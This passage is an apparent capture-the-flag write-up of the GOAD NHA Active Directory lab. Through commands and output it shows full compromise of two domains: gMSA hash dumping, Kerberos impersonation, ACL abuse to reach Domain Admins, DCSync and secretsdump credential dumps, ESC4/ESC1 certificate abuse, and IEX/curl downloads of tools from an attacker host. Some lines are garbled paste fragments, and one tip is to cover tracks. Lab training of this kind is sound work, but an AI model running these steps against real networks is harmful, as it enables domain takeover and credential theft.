[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>dir c:\
C:\Windows\system32>type c:\bot.ps1
$pass=ConvertTo-SecureString 'Il0ve!R4men_<3' -AsPlainText -Force;
$creds=New-Object System.Management.Automation.PSCredential ('academy.ninja.lan\frank', $pass);
Invoke-Command -Computername web.academy.ninja.lan -ScriptBlock {sleep 55} -Authentication 'Credssp' -Credential $creds
C:\Windows\system32>
GMSANFS$@ACADEMY.NINJA.LAN is a Group Managed Service Account. The computer SHARE.ACADEMY.NINJA.LAN can retrieve the password for the GMSA GMSANFS$@ACADEMY.NINJA.LAN.
so i used GMSAPasswordReader.exe as nt authority system
impacket-getST -spn 'eventlog/share' -altservice 'cifs' -impersonate 'Administrator' -aesKey a0d676dd3e4d7673ec255caf010e1e350f1b09d8871b88eb01c4c8ba4217beac 'academy.ninja.lan/frank'
export KRB5CCNAME=Administrator@cifs_share@ACADEMY.NINJA.LAN.ccache
klist
impacket-smbexec share -k -no-pass
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>curl https://192.168.56.1/GMSAPasswordReader.exe -o c:\programdata\gmsapasswordreader.exe
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 103k 100 103k 0 0 847k 0 --:--:-- --:--:-- --:--:-- 895k
C:\Windows\system32>c:\programdata\gmsapasswordreader.exe --accountname GMSANFS$
Calculating hashes for Current Value
[*] Input username : gmsaNFS$
[*] Input domain : ACADEMY.NINJA.LAN
[*] Salt : ACADEMY.NINJA.LANgmsaNFS$
[*] rc4_hmac : 5921F691522FD2C2B78ACDF1FD3F9555
[*] aes128_cts_hmac_sha1 : 6DC9BFC834FC8B601CF08F6D9A18B922
[*] aes256_cts_hmac_sha1 : CEC6190E5DEECFFB79FFD45BEEFE317BC56C497B12424CF5E4E8AE90CF70EF46
[*] des_cbc_md5 : D6542F8C8CB5ECA8
C:\Windows\system32>
.
Verify creds : nxc smb 192.168.56.10-23 -u “gmsaNFS$” -H “5921F691522FD2C2B78ACDF1FD3F9555”
nxc smb 192.168.56.10-23 -u "gmsaNFS$" -H "5921F691522FD2C2B78ACDF1FD3F9555" SMB 192.168.56.10 445 DC-VIL [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-VIL) (domain:ninja.hack) (signing:True) (SMBv1:None) (Null Auth:True) SMB 192.168.56.10 445 DC-VIL [-] ninja.hack\gmsaNFS$:5921F691522FD2C2B78ACDF1FD3F9555 STATUS_LOGON_FAILURE SMB 192.168.56.20 445 DC-AC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-AC) (domain:academy.ninja.lan) (signing:True) (SMBv1:None) (Null Auth:True) SMB 192.168.56.22 445 SQL [*] Windows 10 / Server 2019 Build 17763 x64 (name:SQL) (domain:academy.ninja.lan) (signing:False) (SMBv1:None) SMB 192.168.56.21 445 WEB [*] Windows 10 / Server 2019 Build 17763 x64 (name:WEB) (domain:academy.ninja.lan) (signing:False) (SMBv1:None) SMB 192.168.56.23 445 SHARE [*] Windows 10 / Server 2019 Build 17763 x64 (name:SHARE) (domain:academy.ninja.lan) (signing:False) (SMBv1:None) SMB 192.168.56.20 445 DC-AC [+] academy.ninja.lan\gmsaNFS$:5921F691522FD2C2B78ACDF1FD3F9555 SMB 192.168.56.22 445 SQL [+] academy.ninja.lan\gmsaNFS$:5921F691522FD2C2B78ACDF1FD3F9555 SMB 192.168.56.21 445 WEB [+] academy.ninja.lan\gmsaNFS$:5921F691522FD2C2B78ACDF1FD3F9555 SMB 192.168.56.23 445 SHARE [+] academy.ninja.lan\gmsaNFS$:5921F691522FD2C2B78ACDF1FD3F9555 Running nxc against 14 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
.
next on share server I
net user puck Password123@ /add"
net localgroup administrators /add puck
net localgroup administrators /add frank
Then RDPéd in to share as Frank and started an Admin prompt
C:\ProgramData>Rubeus233.exe asktgt /domain:academy /user:GMSANFS$ /rc4:5921F691522FD2C2B78ACDF1FD3F9555 /pth /nowrap
C:\ProgramData>Rubeus233.exe asktgt /domain:academy /user:GMSANFS$ /rc4:5921F691522FD2C2B78ACDF1FD3F9555 /pth /nowrap
Rubeus.exe ptt /ticket:<BASE64_TICKET>
klist
…
Having a look in BloodHound we can see that the machine gmsaNFS$ has an ACL ForceChangePassword over the backup user. We can use PowerView to do this.
IEX(New-Object Net.WebClient).downloadString('http://192.168.56.1/PowerView.ps1') $NewPassword = ConvertTo-SecureString 'Password123@' -AsPlainText -Force Set-DomainUserPassword -Identity 'backup' -AccountPassword $NewPassword |
After this, we confirm it using netexec
netexec smb 192.168.58.20 -u backup -p 'Password123@' |
Flag captured
Attacking DC-AC (Academy Domain Controller)

Found a Group Managed Service Account: GMSANFS$
It had ForceChangePassword on backup user
Used pth-net rpc to change backup‘s password and logged in.
Found that backup had:WriteOwner on “Domain Admins”
pth-net rpc password “backup” “Password123@” -U “academy.ninja.lan”/”gmsaNFS$”%”ffffffffffffffffffffffffffffffff”:”5921F691522FD2C2B78ACDF1FD3F9555″ -S “192.168.56.20”
$ pth-net rpc password "backup" "Password123@" -U "academy.ninja.lan"/"gmsaNFS$"%"ffffffffffffffffffffffffffffffff":"5921F691522FD2C2B78ACDF1FD3F9555" -S "192.168.56.20" E_md4hash wrapper called. HASH PASS: Substituting user supplied NTLM HASH...
verify creds : nxc smb 192.168.56.20 -u “backup” -p “Password123@”
$ nxc smb 192.168.56.20 -u "backup" -p "Password123@" SMB 192.168.56.20 445 DC-AC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-AC) (domain:academy.ninja.lan) (signing:True) (SMBv1:None) (Null Auth:True) SMB 192.168.56.20 445 DC-AC [+] academy.ninja.lan\backup:Password123@
so now i can add user backup to domains admins groups
net rpc group addmem “Domain admins” “backup” -U “academy.ninja.lan”/”backup”%”P@ssw0rd123!” -S “192.168.56.20”
Could not add backup to Domain admins: NT_STATUS_ACCESS_DENIED
got error
so i accessed to backup account via rdp using runas from SHARE Computer
runas /user:academy.ninja.lan\backup cmd
PS C:\tmp> . .\PowerView.ps1
PS C:\tmp> Set-DomainObjectOwner -Identity “Domain Admins” -OwnerIdentity “ACADEMY\backup”
net rpc group addmem “Domain admins” “backup” -U “academy.ninja.lan”/”backup”%”P@ssw0rd123!” -S “192.168.56.20”
no error showed so its succeed
netexec smb 192.168.56.20 -u ‘backup’ -p ‘P@ssw0rd123!’
SMB 192.168.56.20 445 DC-AC [+] academy.ninja.lan\backup:P@ssw0rd123! (Pwn3d!)
Got Domain Admin
Grabbed the flag from DC-AC.
.
or use : impacket-owneredit -action read -target ‘Domain Admins’ academy.ninja.lan/backup:’Password123@’
$ impacket-owneredit -action read -target 'Domain Admins' academy.ninja.lan/backup:'Password123@' Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Current owner information below [*] - SID: S-1-5-21-1689894000-2828720023-2655755433-512 [*] - sAMAccountName: Domain Admins [*] - distinguishedName: CN=Domain Admins,CN=Users,DC=academy,DC=ninja,DC=lan
.
We can use this to change the owner of the Domain Admins group to backup as well.
then : impacket-owneredit -action write -new-owner ‘backup’ -target ‘Domain Admins’ academy.ninja.lan/backup:’Password123@’
$ impacket-owneredit -action write -new-owner 'backup' -target 'Domain Admins' academy.ninja.lan/backup:'Password123@' Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Current owner information below [*] - SID: S-1-5-21-1689894000-2828720023-2655755433-512 [*] - sAMAccountName: Domain Admins [*] - distinguishedName: CN=Domain Admins,CN=Users,DC=academy,DC=ninja,DC=lan [*] OwnerSid modified successfully!
.
Once that is done we can easily update the user backup to have GenericAll privileges over the Domain Admins group using dacledit.py.
thus then : impacket-dacledit -action ‘write’ -rights ‘FullControl’ -principal backup -target ‘Domain Admins’ ‘academy.ninja.lan’/’backup’:’Password123@’
$ impacket-dacledit -action 'write' -rights 'FullControl' -principal backup -target 'Domain Admins' 'academy.ninja.lan'/'backup':'Password123@' Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] DACL backed up to dacledit-20260909-123930.bak [*] DACL modified successfully!
This can again be confirmed using BloodHound dump.
bloodhound-python -c all -d academy.ninja.lan -v -u backup -p 'Password123@' -ns 192.168.56.20 --zip
Once that is confirmed, the only thing remaining is really just adding ourselves in the Domain Admins group.
thus then : net rpc group addmem 'Domain Admins' backup -U academy.ninja.lan/backup -S 192.168.56.20
$ net rpc group addmem 'Domain Admins' backup -U academy.ninja.lan/backup -S 192.168.56.20 Password for [ACADEMY.NINJA.LAN\backup]: Password123@
With all this out of the way, we can finally dump the domain secrets using secretsdump.py and pwn the whole domain.
thus : impacket-secretsdump ‘academy.ninja.lan’/’backup’:’Password123@’@192.168.56.20 -dc-ip 192.168.56.20 -outputfile nha-domain1.txt
$ impacket-secretsdump 'academy.ninja.lan'/'backup':'Password123@'@192.168.56.20 -dc-ip 192.168.56.20 -outputfile nha-domain1.txt Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Service RemoteRegistry is in stopped state [*] Starting service RemoteRegistry [*] Target system bootKey: 0x7ad9a178f153c71e79df54bc4542a543 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:8fd12ffe951b45af5bea2bd921accba4::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:6b5b5071de731b4a048a38e0642ffb33::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:85a647f698d2dcb50ee92ccabee39061::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: alice:1115:aad3b435b51404eeaad3b435b51404ee:fcc5006e4079986d1e462efaa05e14fe::: <snip> [*] Kerberos keys grabbed alice:aes256-cts-hmac-sha1-96:0243e09e78c5117a62a869997143fba060fe39add6254e57598a0024c7d4869a alice:aes128-cts-hmac-sha1-96:0ab4ec8a6093b60aa5d0786928cdeb56 alice:des-cbc-md5:625837132ab38cb9 <snip>
.
So 1st academy domain now pwned
thus : evil-winrm -i 192.168.56.20 -u “alice” -H “fcc5006e4079986d1e462efaa05e14fe”
$ evil-winrm -i 192.168.56.20 -u "alice" -H "fcc5006e4079986d1e462efaa05e14fe" *Evil-WinRM* PS C:\Users\alice\Documents> whoami academy\alice
.
.
Final Win — DC-VIL (ninja.hack)
After fully compromising the academy.ninja.lan domain, it was time to go after the second one — ninja.hack, hosted on 192.168.56.10.
Exception calling "FindAll" with "0" argument(s): "An operations error occurred" when running Get-NetUser (a PowerView cmdlet) ).Get-NetUser cmdlet. This forces PowerView to create a new, authenticated network connection rather than relying on your delegated WinRM token.# Create a credential object
$passwd = ConvertTo-SecureString "Password123@" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ("academy\backup", $passwd)
# Run the command with explicit credentials
Get-NetUser -Domain ninja.hack -Credential $cred
Domain Trust Enumeration
Using PowerView, I checked if there was any trust between the two domains:
Get-NetDomainTrust
And yes — it’s bidirectional trust
That means I can enumerate and interact with ninja.hack using users from academy.ninja.lanand i can extract the users and use sharphound
Get-NetUser -Domain ninja.hack | Select-Object SamAccountName
.\SharpHound.exe -c all -d ninja.hack
thus : ./sharphoundce.exe -c all -d ninja.hack --ldapusername backup --ldappassword 'Password123@'
User Discovery with Kerbrute
I ran Kerbrute against both domains to find valid users.
kerbrute userenum -d ninja.hack — dc 192.168.56.10 hack_user
kerbrute userenum -d academy.ninja.lan — dc 192.168.56.20 users
From that, I noticed some users have the same name but different format:
alicein academy →alice.johnsonin ninjaolivia→olivia.davisfrank→frank.umino
I decided to try spraying the NTLM hashes I got earlier from academy onto these users.
$ nxc smb 192.168.56.10 -u "olivia.davis" -H "91d85135bb2c4e12c46efbb77612c487" SMB 192.168.56.10 445 DC-VIL [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-VIL) (domain:ninja.hack) (signing:True) (SMBv1:None) (Null Auth:True) SMB 192.168.56.10 445 DC-VIL [+] ninja.hack\olivia.davis:91d85135bb2c4e12c46efbb77612c487 $ nxc smb 192.168.56.20 -u "olivia" -H "91d85135bb2c4e12c46efbb77612c487" SMB 192.168.56.20 445 DC-AC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-AC) (domain:academy.ninja.lan) (signing:True) (SMBv1:None) (Null Auth:True) SMB 192.168.56.20 445 DC-AC [+] academy.ninja.lan\olivia:91d85135bb2c4e12c46efbb77612c487
olivia.davis worked! I had valid creds for her in ninja.hack.
Using BloodHound, I discovered that olivia.davis has WriteDACL permissions on rachel.philips.
That means I can give olivia full control over rachel:
Press enter or click to view image in full size

1: impacket-dacledit -action 'read' -principal olivia.davis -target 'rachel.philips' 'ninja.hack'/'olivia.davis' -hashes <rc4hash>'
2: impacket-dacledit -action 'write' -rights 'FullControl' -principal 'olivia.davis' -target 'rachel.philips' 'ninja.hack'/'olivia.davis' -hashes <rc4hash>'
$ impacket-dacledit -action 'read' -principal olivia.davis -target 'rachel.philips' 'ninja.hack'/'olivia.davis' -hashes aad3b435b51404eeaad3b435b51404ee:91d85135bb2c4e12c46efbb77612c487 Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Parsing DACL [*] Printing parsed DACL [*] Filtering results for SID (S-1-5-21-1377167689-3644946187-504094176-1115) [*] ACE[19] info [*] ACE Type : ACCESS_ALLOWED_ACE [*] ACE flags : None [*] Access mask : WriteDACL (0x40000) [*] Trustee (SID) : olivia.davis (S-1-5-21-1377167689-3644946187-504094176-1115) $ impacket-dacledit -action 'write' -rights 'FullControl' -principal 'olivia.davis' -target 'rachel.philips' 'ninja.hack'/'olivia.davis' -hashes aad3b435b51404eeaad3b435b51404ee:91d85135bb2c4e12c46efbb77612c487 Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] DACL backed up to dacledit-20260910-102244.bak [*] DACL modified successfully!
Then I reset rachel‘s password using: pth-net rpc password "RACHEL.PHILIPS" "P@ssw0rd123@" ...
$ pth-net rpc password "RACHEL.PHILIPS" "P@ssw0rd123@" -U "ninja.hack/OLIVIA.DAVIS%ffffffffffffffffffffffffffffffff:91d85135bb2c4e12c46efbb77612c487" -S 192.168.56.10 E_md4hash wrapper called. HASH PASS: Substituting user supplied NTLM HASH...
We were able to successfully change the access to FullControl to the user rachel.philips. Now we can change this user’s password to access it. We cant use shadow credentials to get the hash for this user as done here because we get KDC_ERR_PADATA_TYPE_NOSUPP error meaning ther DC is not set for PKINIT authentication. We could also use bloodyAD for it as seen here.
.
$ bloodyAD --host 192.168.56.10 -d ninja.hack -u olivia.davis -p :91d85135bb2c4e12c46efbb77612c487 set password rachel.philips 'Password123@' [+] Password changed successfully! $ nxc smb 192.168.56.10 -u "rachel.philips" -p "Password123@" SMB 192.168.56.10 445 DC-VIL [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-VIL) (domain:ninja.hack) (signing:True) (SMBv1:None) (Null Auth:True) SMB 192.168.56.10 445 DC-VIL [+] ninja.hack\rachel.philips:Password123@
Logged in as rachel.philips successfully
Group Membership + Privilege Escalation
Found out that RACHEL.PHILIPS can be added to the JONIN group because the SANIN group (which she is a part of) has GenericAll over it.
So I did:
use: net rpc group addmem “JONIN” “RACHEL.PHILIPS” -U “NINJA.HACK/RACHEL.PHILIPS%Password123@” -S 192.168.56.10
or use: bloodyAD –host 192.168.56.10 -d ninja.hack -u rachel.philips -p ‘Password123@’ add groupMember jonin rachel.philips
and verify with : ldeep ldap -u rachel.philips -p ‘Password123@’ -d ninja.hack -s ldap://192.168.56.10 membersof ‘JONIN’
$ ldeep ldap -u rachel.philips -p 'Password123@' -d ninja.hack -s ldap://192.168.56.10 membersof 'JONIN' rachel.philips (user) uma.johnson (user) katherine.white (user) yara.yuhi (user) david.wilson (user)
or verify with : net rpc group members “JONIN” -U “NINJA.HACK/RACHEL.PHILIPS%Password123@” -S 192.168.56.10
or verify with : net rpc group list -U “NINJA.HACK/RACHEL.PHILIPS%Password123@” -S 192.168.56.100
Still, nothing valuable on BloodHound — so I dug deeper…
nxc smb 192.168.56.10 -u 'RACHEL.PHILIPS' -p 'Password123@' -M enum_ca
nxc ldap 192.168.56.10 -u 'RACHEL.PHILIPS' -p 'Password123@' -M adcs
found cert so i used
use: certipy find -u ‘rachel.philips@ninja.hack’ -p ‘Password123@’ -dc-ip 192.168.56.10 -vulnerable -stdout
Found one! ➜ SignatureValidation
$ certipy find -u 'rachel.philips@ninja.hack' -p 'Password123@' -dc-ip 192.168.56.10 -vulnerable -stdout
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
<snip>
Certificate Templates
0
Template Name : SignatureValidation
Display Name : SignatureValidation
Certificate Authorities : NINJA-CA
Enabled : True
Client Authentication : False
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectAltRequireUpn
SubjectRequireEmail
SubjectRequireDirectoryPath
Enrollment Flag : IncludeSymmetricAlgorithms
PendAllRequests
PublishToDs
AutoEnrollment
Private Key Flag : ExportableKey
Extended Key Usage : Code Signing
Requires Manager Approval : True
Requires Key Archival : False
RA Application Policies : Any Purpose
Authorized Signatures Required : 1
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2026-08-18T08:30:54+00:00
Template Last Modified : 2026-08-18T08:31:13+00:00
Permissions
Enrollment Permissions
Enrollment Rights : NINJA.HACK\Domain Users
Object Control Permissions
Owner : NINJA.HACK\Enterprise Admins
Full Control Principals : NINJA.HACK\Domain Admins
NINJA.HACK\Jonin
NINJA.HACK\Local System
NINJA.HACK\Enterprise Admins
Write Owner Principals : NINJA.HACK\Domain Admins
NINJA.HACK\Jonin
NINJA.HACK\Local System
NINJA.HACK\Enterprise Admins
Write Dacl Principals : NINJA.HACK\Domain Admins
NINJA.HACK\Jonin
NINJA.HACK\Local System
NINJA.HACK\Enterprise Admins
[+] User Enrollable Principals : NINJA.HACK\Domain Users
NINJA.HACK\Jonin
[+] User ACL Principals : NINJA.HACK\Jonin
[!] Vulnerabilities
ESC4 : User has dangerous permissions.
┌──(bolke㉿kali)-[~]
and ESC4 vulnerable
As said by lummelsec on this post, we can use this command to make this certificate vulnerable to ECS1.
-save-old was replaced. In Certipy v5+, you must use the -write-default-configuration flag to tell the tool to overwrite the template configuration to make it vulnerable to ESC1. [1]SignatureValidation into an ESC1-vulnerable template: [1]certipy template -u 'rachel.philips@ninja.hack' -p 'Password123@' -dc-ip '192.168.56.10' -template 'SignatureValidation' -write-default-configuration
certipy req to exploit the ESC1 state. You can specify a high-privileged User Principal Name (like Administrator) using the -upn flag: [1]certipy req -u 'rachel.philips@ninja.hack' -p 'Password123@' -dc-ip '192.168.56.10' -target '192.168.56.10' -ca 'NINJA-CA' -template 'SignatureValidation' -upn 'Administrator@ninja.hack'
(Note: Replace NINJA-CA with the actual CA Name found earlier in your certipy find text file).
┌──(bolke㉿kali)-[~] └─$ certipy template -u 'rachel.philips@ninja.hack' -p 'Password123@' -dc-ip '192.168.56.10' -template 'SignatureValidation' -write-default-configuration Certipy v5.0.4 - by Oliver Lyak (ly4k) [*] Saving current configuration to 'SignatureValidation.json' [*] Wrote current configuration for 'SignatureValidation' to 'SignatureValidation.json' [*] Updating certificate template 'SignatureValidation' [*] Deleting: [*] msPKI-RA-Application-Policies: [] [*] Replacing: [*] nTSecurityDescriptor: b'\x01\x00\x04\x9c0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x02\x00\x1c\x00\x01\x00\x00\x00\x00\x00\x14\x00\xff\x01\x0f\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00' [*] flags: 66104 [*] pKIDefaultKeySpec: 2 [*] pKIKeyUsage: b'\x86\x00' [*] pKIMaxIssuingDepth: -1 [*] pKICriticalExtensions: ['2.5.29.19', '2.5.29.15'] [*] pKIExtendedKeyUsage: ['1.3.6.1.5.5.7.3.2'] [*] msPKI-RA-Signature: 0 [*] msPKI-Enrollment-Flag: 0 [*] msPKI-Private-Key-Flag: 16 [*] msPKI-Certificate-Name-Flag: 1 [*] msPKI-Certificate-Application-Policy: ['1.3.6.1.5.5.7.3.2'] Are you sure you want to apply these changes to 'SignatureValidation'? (y/N): y [*] Successfully updated 'SignatureValidation' ┌──(bolke㉿kali)-[~] └─$ certipy req -u 'rachel.philips@ninja.hack' -p 'Password123@' -dc-ip '192.168.56.10' -target '192.168.56.10' -ca 'NINJA-CA' -template 'SignatureValidation' -upn 'Administrator@ninja.hack' Certipy v5.0.4 - by Oliver Lyak (ly4k) [*] Requesting certificate via RPC [*] Request ID is 3 [*] Successfully requested certificate [*] Got certificate with UPN 'Administrator@ninja.hack' [*] Certificate has no object SID [*] Try using -sid to set the object SID or see the wiki for more details [*] Saving certificate and private key to 'administrator.pfx' [*] Wrote certificate and private key to 'administrator.pfx' ┌──(bolke㉿kali)-[~]
.
.pfx certificate file, immediately revert the template to its original settings to cover your tracks. Certipy v5 does this by reading the generated configuration JSON file: [1, 2]certipy template -u 'rachel.philips@ninja.hack' -p 'Password123@' -dc-ip '192.168.56.10' -template 'SignatureValidation' -write-configuration 'SignatureValidation.json' -no-save
┌──(bolke㉿kali)-[~]
└─$ certipy find -u 'rachel.philips@ninja.hack' -p 'Password123@' -dc-ip '192.168.56.10' -vulnerable -stdout
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
<snip>
Certificate Templates
0
Template Name : SignatureValidation
Display Name : SignatureValidation
Certificate Authorities : NINJA-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Private Key Flag : ExportableKey
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2026-08-18T08:30:54+00:00
Template Last Modified : 2026-09-10T09:59:51+00:00
Permissions
Object Control Permissions
Owner : NINJA.HACK\Enterprise Admins
Full Control Principals : NINJA.HACK\Authenticated Users
Write Owner Principals : NINJA.HACK\Authenticated Users
Write Dacl Principals : NINJA.HACK\Authenticated Users
[+] User Enrollable Principals : NINJA.HACK\Authenticated Users
[+] User ACL Principals : NINJA.HACK\Authenticated Users
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
ESC4 : User has dangerous permissions.
.
now its shows ESC1–4 i will abuse ESC1
1: certipy req -u ‘rachel.philips@ninja.hack’ -p ‘Password123@’ -ca ‘NINJA-CA’ -template ‘SignatureValidation’ -upn ‘Administrator@ninja.hack’ -target-ip ‘192.168.56.10’
2:certipy auth -pfx administrator.pfx -dc-ip 192.168.56.10
i got error
[-] Object SID mismatch between certificate and user ‘administrator’
┌──(bolke㉿kali)-[~] └─$ certipy auth -pfx administrator.pfx -dc-ip 192.168.56.10 Certipy v5.0.4 - by Oliver Lyak (ly4k) [*] Certificate identities: [*] SAN UPN: 'Administrator@ninja.hack' [*] Using principal: 'administrator@ninja.hack' [*] Trying to get TGT... [-] Object SID mismatch between certificate and user 'administrator' [-] See the wiki for more information
we need add the sid of user administrator to the req
i got the sid from rpcclient (or get it from bloodhound) : rpcclient -U ‘rachel.philips’ 192.168.56.10 -c ‘lookupnames administrator’
1: certipy req -u ‘rachel.philips@ninja.hack’ -p ‘Password123@’ -ca ‘NINJA-CA’ -template ‘SignatureValidation’ -upn ‘Administrator@ninja.hack’ -target-ip ‘192.168.56.10’ -sid ‘S-1-5-21-1377167689-3644946187-504094176-500”
2: certipy auth -pfx administrator.pfx -dc-ip 192.168.56.10
$ rpcclient -U 'rachel.philips' 192.168.56.10 -c 'lookupnames administrator' Password for [WORKGROUP\rachel.philips]: administrator S-1-5-21-1377167689-3644946187-504094176-500 (User: 1) $ certipy req -u 'rachel.philips@ninja.hack' -p 'Password123@' -ca 'NINJA-CA' -template 'SignatureValidation' -upn 'Administrator@ninja.hack' -target-ip '192.168.56.10' -sid 'S-1-5-21-1377167689-3644946187-504094176-500' Certipy v5.0.4 - by Oliver Lyak (ly4k) [!] DNS resolution failed: All nameservers failed to answer the query NINJA.HACK. IN A: Server Do53:1.1.1.2@53 answered [Errno 101] Network is unreachable [!] Use -debug to print a stacktrace [*] Requesting certificate via RPC [*] Request ID is 6 [*] Successfully requested certificate [*] Got certificate with UPN 'Administrator@ninja.hack' [*] Certificate object SID is 'S-1-5-21-1377167689-3644946187-504094176-500' [*] Saving certificate and private key to 'administrator.pfx' File 'administrator.pfx' already exists. Overwrite? (y/n - saying no will save with a unique filename): y [*] Wrote certificate and private key to 'administrator.pfx' $ certipy auth -pfx administrator.pfx -dc-ip 192.168.56.10 Certipy v5.0.4 - by Oliver Lyak (ly4k) [*] Certificate identities: [*] SAN UPN: 'Administrator@ninja.hack' [*] SAN URL SID: 'S-1-5-21-1377167689-3644946187-504094176-500' [*] Security Extension SID: 'S-1-5-21-1377167689-3644946187-504094176-500' [*] Using principal: 'administrator@ninja.hack' [*] Trying to get TGT... [*] Got TGT [*] Saving credential cache to 'administrator.ccache' [*] Wrote credential cache to 'administrator.ccache' [*] Trying to retrieve NT hash for 'administrator' [*] Got hash for 'administrator@ninja.hack': aad3b435b51404eeaad3b435b51404ee:6<redacted>3
.
for trouble shooting certipy make sure you are using 5.0.4 version
the sid maybe changed
if You faced error restart the lab
Next we can use these command to grant DCSync privileges to rachel.philips and dump secrets of the ninja.hack domain.
certipy cert -pfx “administrator.pfx” -nokey -out “user.crt”
certipy cert -pfx “administrator.pfx” -nocert -out “user.key”
python3 passthecert.py -action modify_user -crt “user.crt” -key “user.key” -domain “ninja.hack” -dc-ip 192.168.56.10 -target “rachel.philips” -elevate
we use : https://github.com/AlmondOffSec/PassTheCert/tree/main for PassTheCert.py
$ certipy req -u 'rachel.philips@ninja.hack' -p 'Password123@' -ca 'NINJA-CA' -template 'SignatureValidation' -upn 'Administrator@ninja.hack' -target-ip '192.168.56.10' -sid 'S-1-5-21-1377167689-3644946187-504094176-500' Certipy v5.0.4 - by Oliver Lyak (ly4k) [*] Requesting certificate via RPC [*] Request ID is 6 [*] Successfully requested certificate [*] Got certificate with UPN 'Administrator@ninja.hack' [*] Certificate object SID is 'S-1-5-21-1377167689-3644946187-504094176-500' [*] Wrote certificate and private key to 'administrator.pfx' $ certipy cert -pfx "administrator.pfx" -nokey -out "user.crt" Certipy v5.0.4 - by Oliver Lyak (ly4k) [*] Data written to 'user.crt' [*] Writing certificate to 'user.crt' $ certipy cert -pfx "administrator.pfx" -nocert -out "user.key" Certipy v5.0.4 - by Oliver Lyak (ly4k) [*] Data written to 'user.key' [*] Writing private key to 'user.key' $ python3 passthecert.py -action modify_user -crt "user.crt" -key "user.key" -domain "ninja.hack" -dc-ip 192.168.56.10 -target "rachel.philips" -elevate Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Granted user 'rachel.philips' DCSYNC rights!
.
find the gold: impacket-secretsdump -just-dc ninja.hack/rachel.philips:’Password123@’@ninja.hack
use: evil-winrm -i 192.168.56.10 -u “alice.johnson” -H “c689c7d8bec0df70927c3574040e827b”
or: nxc smb dc-vil.ninja.hack -u ‘alice.johnson’ -H ‘c689c7d8bec0df70927c3574040e827b’ –generate-tgt alice_tgt
: export KRB5CCNAME=alice_tgt.ccache
: evil-winrm -i dc-vil.ninja.hack -r NINJA.HACK
.
Special Thanks
Thanks too : NHA Lab Write-Up — From Web to Domain Admin (Twice) | by Law | Medium
and Big thanks to the Mayfly who made this lab — it was super fun and helpful.
If you want to try it, here’s the link:
https://orange-cyberdefense.github.io/GOAD/labs/NHA/